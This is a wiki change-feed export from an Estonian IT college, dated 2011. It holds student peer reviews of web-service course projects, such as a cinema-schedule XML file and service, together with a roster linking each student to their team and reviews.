== Rakenduse arvustus ==&lt;br /&gt;
&lt;br /&gt;
Eriti meeldis see toodetekuvamise rakendus. Seal võiks veel juures olla see, et kui seda kuvada suuremale ekraanile siis on toidud kahes tulbas.&lt;br /&gt;
Desktopi rakendususe puhul võika aint õelda, et võibolla on kassapidaja jaoks seal ka mitte tarviliku infot nagu ID&#039;d mis teda ilmselt tegelt ei huvita. Kuid oma eesmärgi milleks oli kirjete kustutamine ja hindade muutmine ta täidab.&lt;br /&gt;
Facebooki api&#039;s võiks veel olla kohviku enda asukoha kohta midagi näidatud ja millal lahti. Muidu oli hea et midagi üleliigset seal ei olnud.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Siim Sarv&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Kokkuvõttev arvustus ===&lt;br /&gt;
&lt;br /&gt;
Väga positiivne hinnang kogu meeskonnale. Hea näha, et ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele. &lt;br /&gt;
Tööd olid alati esitatud õigeaegselt, esitlus selge ja korralik. Teema oli küll laialt levinud ja paljude poolt valitud, kuid teostus arvatavasti parim.&lt;br /&gt;
&lt;br /&gt;
MVC 3 kasutamine on hea mõte, eriti just suuremate ja mahukamate projektide puhul.&lt;br /&gt;
Rakenduse puhul meeldis profesionaalne välimus (eriti admin liidesel) ja erinevad lisad nagu facebooki kasutamine.&lt;br /&gt;
&lt;br /&gt;
Hea töö!&lt;br /&gt;
&lt;br /&gt;
Arvustas,&lt;br /&gt;
Priit Siimo&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=33821</id>
		<title>Võrgurakendused II: 2011 kevadel valminud kodutööd</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=33821"/>
		<updated>2011-06-06T08:19:05Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Tanel Liiv */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Jaan Igamees=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kert Suvi=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Helen Muidik=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Mihkel Sokk=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Seda Sahradyan=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Priit Siimo=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Hungry_Student_Food_Board%22]]&lt;br /&gt;
&lt;br /&gt;
=Siim Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Reigo Männiste=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Karl Männil=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Ilmar Telga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Siim Aaver=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taavi Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_&amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_&amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_Tool]]&lt;br /&gt;
&lt;br /&gt;
=Jaan Kruusma=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Andrus Reedla=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Jaak Lehtsalu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jana Mrots=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond  &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Heiki Tamm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Meeskond&amp;quot;]]&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond  &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Toomas Soha=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22C_terav%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Tact%22]]&lt;br /&gt;
&lt;br /&gt;
=Miina Sikk=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Rauno Rüga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Tanel Liiv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Gaspar Karm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Joosep Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_&amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taivo Türnpu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Sander Baikov=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Allar Anijago=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tool&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Kaspar Kallasmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jarko Kaskmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22H2%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22H2%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Lauri Kermas=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Indrek Kõue=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Erik Kaju=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Mailis Toompuu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Kõosaar=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Gert Glükmann=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Martin Lensment=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond_&amp;quot;FoodWars&amp;quot;]] ja [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_&amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Sildaru=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Indrek Kruuser=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33820</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33820"/>
		<updated>2011-06-06T08:18:43Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Kokkuvõttev arvustus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
